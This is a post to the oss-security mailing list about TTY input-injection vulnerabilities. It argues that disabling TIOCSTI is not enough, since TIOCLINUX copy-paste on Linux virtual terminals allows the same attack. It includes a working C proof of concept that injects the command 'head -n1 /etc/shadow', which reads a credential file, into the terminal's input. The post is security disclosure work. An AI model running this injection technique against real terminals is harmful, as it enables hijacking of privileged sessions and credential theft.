List: oss-security
Subject: Re: [oss-security] TTY pushback vulnerabilities / TIOCSTI
From: Jakub Wilk <jwilk () jwilk ! net>
Date: 2023-03-14 10:36:26
Message-ID: 20230314103626.3ucbt2rjdfhjbe6t () jwilk ! net
* Hanno Böck <hanno@hboeck.de>, 2023-03-14 09:51:
>In the 2017 post solar designer mentioned that the Linux kernel
>developers have multiple times rejected changes in the kernel.

I believe this is the post in question:
https://www.openwall.com/lists/oss-security/2017/06/03/9

>Starting with Kernel 6.2 it is possible to disable TIOCSTI (unset
>CONFIG_LEGACY_TIOCSTI).

Nice, but...
On Linux virtual terminals, it's possible to achieve pretty much the
same effect using TIOCLINUX, the ioctl used by gpm to implement
copy&pasting.

I've attached a minimal PoC. A more elaborate one is here:
https://github.com/jwilk/ttyjack

--
Jakub Wilk
["minittyjack.c" (text/x-csrc)]
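#include <stdio.h>
#include <sys/ioctl.h>
#include <linux/tiocl.h>
#include <linux/vt.h>

int main(void)
{
    /* Clear the screen and home the cursor, so the next line lands on row 1. */
    printf("\33[H\33[2J");
    printf("head -n1 /etc/shadow\n");
    fflush(stdout);
    /* TIOCLINUX takes a pointer to the subcode byte, followed directly by
     * the argument struct; the padding byte keeps that layout aligned. */
    struct {
        char padding;
        char subcode;
        struct tiocl_selection sel;
    } data = {
        .subcode = TIOCL_SETSEL,
        .sel = {
            .xs = 1, .ys = 1,
            .xe = 1, .ye = 1,
            .sel_mode = TIOCL_SELLINE
        }
    };
    /* Select screen line 1, as gpm would for a mouse selection. */
    ioctl(0, TIOCLINUX, &data.subcode);
    /* Paste the selection into the terminal's input queue. */
    data.subcode = TIOCL_PASTESEL;
    ioctl(0, TIOCLINUX, &data.subcode);
}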